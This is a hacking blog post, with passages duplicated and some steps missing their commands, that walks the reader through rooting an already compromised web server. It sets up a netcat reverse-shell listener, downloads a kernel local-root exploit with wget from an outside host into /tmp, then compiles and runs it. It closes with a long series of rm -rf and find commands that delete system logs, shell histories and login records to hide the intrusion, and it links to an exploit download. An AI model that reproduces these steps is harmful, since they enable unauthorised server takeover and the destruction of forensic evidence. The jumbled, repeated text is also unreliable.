Hi guys today i will tell you how to root a server in few easy steps .
thz to 1 of my frends ALMAS MALIK Aka Code smasher
Things Required :
NetcaT
Shelled site
Local root expl0it
Step By Step Tutorial :
First go to Run & type cmd then type :
( Make sure that you Netcat is saved in the following directory ) .
![[Image: 11.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Ua5X1uAVN5ESE7RAWWQvDNODpNW0zlUt_OKYwyYmj9meupWueiTZMQhDqh217_efm8dFfLUzzaGbZjY0uAIjOzF2xmeNuDCrk4KjW3GN-OMX75srmm3CNO3_147o2qpbBDiXDCsXt3s/s1600/11.jpg)
Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .
![[Image: 12.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBfQ1pS72ClHT_hUeNktvR8D5JZwZ6DCbt0EylvKY2-lVahxiyos2u_NQrRqlgpQkugcD_HIjMhrLyROb2KbIHgKp_0u6jB81tvEnD9iUlp45WzC_3_09xxeka4WTSSiyfS3DhRusOG-Q/s1600/12.jpg)
Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .
![[Image: 13.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh6BKNLUNL9rFwJnJ9fbC1KEDDF1jR1xDZP1zOk_qBvb7lvhIXNL5eq_huuH4kWAspYDyEdTss0pYNa9nXR1KcEgoUDfolgsPezOcApSmycBPTl36PDQuFrFMDH9Z4a04syEpXsYSpQms/s1600/13.jpg)
![[Image: CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p...127+AM.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3wDZ-1-_nnCbzJUCPod8iErtjbjZgVFytSkHhlOwp1X293pCkMVROPqlff6Zdu7MdjM4_1ctqZcHn1TPfunoR857ButxQcuPkyTxeeZKSaC0lzXvmQyTp08NTzBera2isnDE-mErJESw/s1600/CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p+443+4202012+32127+AM.jpg)
So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .
![[Image: 14.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2hDs3EwzITeLHZxjDQpD27ASz1grCyvWToaZhPcoQz-QalPZw_4abGl2Yzu9149SUiENj7uotepCcBihDfPf2MrVkaL6xlJ3fh_BvQBIrG-E88AgjsBKxiEpfD9OfMbY0mgkhbqDVApA/s1600/14.jpg)
In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp :
To upload your your exploit we will use wget function .
Type :
Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type
Type:
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
Hope you all guys have enjoyed this Tutorial .. If you have any Doubts then just mention it Via reply !
Use this hack wisely :)
And the download links
Netcat : http://www.downloadnetcat.com/nc11nt.zip
Local root exploit : http://pastebin.com/download.php?i=6eUFD2
thz to 1 of my frends ALMAS MALIK Aka Code smasher
Things Required :
NetcaT
Shelled site
Local root expl0it
Step By Step Tutorial :
First go to Run & type cmd then type :
cd C:\Program Files\Netcat
( Make sure that you Netcat is saved in the following directory ) .
Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .
Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .
So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .
In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp :
cd /tmp
To upload your your exploit we will use wget function .
Type :
wget http://www.somesite.com/exploit.c
Now this will upload the exploit in the tmp folder .
![[Image: 15.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguoLIsqq6s-kcrVXVuzXoJ0Yvgzhst4_nqn3AB9cd1NPNRFEvK3CFxs0I-gjhbUAcqWbMMpbaS6nAj0z1BRMqyLVMM_TxtaIDyd0oRAvn2URREgs64PH-AEKA_HpAY__4DU139p-z2Jks/s1600/15.jpg)
(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type :
Now this will upload the exploit in the tmp folder .
(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type :
gcc exploit.c -o exploit
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type:
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type:
unzip exploit.zip
After we have done all the above steps correctly, its time to give permission so we will type the following command
Type:
After we have done all the above steps correctly, its time to give permission so we will type the following command
Type:
chmod 777 exploit
Now its time to run the Exploit, to run the exploit we will type the following command
Type:
Now its time to run the Exploit, to run the exploit we will type the following command
Type:
./exploit
Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type
Type:
id or whoami
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
Hope you all guys have enjoyed this Tutorial .. If you have any Doubts then just mention it Via reply !
Use this hack wisely :)
And the download links
Netcat : http://www.downloadnetcat.com/nc11nt.zip
Local root exploit : http://pastebin.com/download.php?i=6eUFD2
No comments:
Post a Comment